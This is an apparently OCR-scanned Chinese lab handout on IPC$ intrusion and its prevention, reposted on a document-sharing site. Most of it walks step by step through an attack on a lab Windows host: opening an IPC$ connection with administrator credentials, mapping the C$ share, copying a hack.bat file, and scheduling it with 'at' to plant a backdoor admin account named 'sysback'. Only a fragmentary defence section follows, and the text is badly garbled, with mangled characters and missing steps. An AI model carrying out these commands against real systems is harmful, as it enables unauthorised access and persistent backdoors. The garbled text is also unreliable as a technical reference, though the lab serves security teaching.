实验二IPC$入侵的防护

《实验二IPC$入侵的防护》由会员上传分享，免费在线阅读，更多相关内容在工程资料-天天文库。

1、实验二IPC$入侵的防护【实验目的】•掌握卩。$连接的防护手段•了解利用卩。$连接进行远程文件操作的方法•了解利用IPC$连接入侵主机的方法【实验步骤】一、IPC$连接的建立与断开通过IPC$连接远程主机的条件是已获得目标主机管理员的账号和密码。1、单击“开始”-一“运行”，在“运行”对话框中输入“cmd”2、建/.IPC$连接，键入命令netuse\192・168・92・132ipc$123/user:administrator•3、映射网络驱动器，使用命令：netusey:\192.168.92.132c$C：Documents

2、andSettingsXAdministrausez:7L92.168.92.132c$发生系统错误85.本地设备名己在使用中。C：DocumentsandSottingsAdministrausey：\192.168.92.132c$命令成功完成。4、映射成功后，打开“我的电脑”，会发现多了一个y盘，该磁盘即为目标主机的C盘5、在该磁盘中的操作就像对木地磁盘操作一样6^断开连接，键入netuse*/del命令，断开所有的连接C：DocunentsandSettingsXAdninistuse*/del您有以下的远程连接：Z:\

3、unware-hostShai・edFolders\192.168.92.132ipc$继续运行会取消连接。7、通过命令netuse\H标上机IPipc$/del可以删除指定口标IP的IPC$连接。C：DocuneandSettingsAdninistrause\192.168.92.132/delW192.168.92.132己经删除。C：DocunentsandSettingsAdninistrator>netuse\192.168.92.132ipc$/del找不到网络连接。请键入NETHELPMSG2250以茨得

4、更多的帮助。二、建立后门账号1、编写BAT文件，内容与文件名如下，格式改为：.bat2、与目标主机建立1卩。$连接3、复制文件到目标主机。（或映射驱动器后直接将hack.bat放入目标主机的C盘中）4、打开DOS窗口,键入命令:copyc:hack.batM92.168.92.132c$命令成功后,就已经把c盘下的hack.bat文件拷贝到192.168.92.132的C盘内。C：>copyhack.bat\192.168.92.132c$已复制1个文件。5、通过计划任务使远程主机执行hack.bat文件，键入命令：nettime

5、192,168.92,132,查看目标主机的时间。C:>nettime\192.168.92.132X192.168.92.132的当前时间是2015-12-112：56EXX192.168.92.132的本地时间是2015-11-3020：56冷令成功完成。6、如图，目标主机的系统时间为20:56,则可键入命令：at\192.168.92.13221:00c:hack.bat,然后断开IPC$连接。W192.168.92.13221：00c:Jiack.bat新加了一项彳乍业，其传业ID=1C：>netu

6、se\192.168.92.132/delW192.168.92.132己经删除。7、验证账号是否成功建立。等一段时间后，佔计远程主机已经执行了hack.bat文件，通过建立IPC$连接來验证是否成功建立“sysback”账号:建立IPC$连接，键入命令netuse\192.168.92.132ipc$123/user:sysbackC：DocunentsandSettingsAdninistrator>netuse7L92.168.92.132ipc$123/user：sysback命令成功完成。8、若连接成功，说明管理员账号“

7、sysback”已经成功建立连接。3、将其复制到本机“开始”…-“程序”-…“启动”中。4、禁止空连接,将该命令unetstopserver/y”加入noshare.bat文件中或打开"控制面板”.…“管理工具”.一…“服务”，找到server,单击右键，选择属性，选择“禁用”。«

8、

9、舸囹回忌留函卜Server停止此服务簪鬲此服务董頁动此服务描述・支持此计算机通过网络的文件S打印、和命名管道共享。如果服务停止，这些功能不可用。如果服务被禁用，任何直接依赖于此服务的服务将无法启动。^^RemoteProcedu..・启・・・手动^)RemoteR

10、egistry使…已启动自动RemovableStorage管…手动^^ResultantSet・・・启・・・手动utingandRe...在…禁用S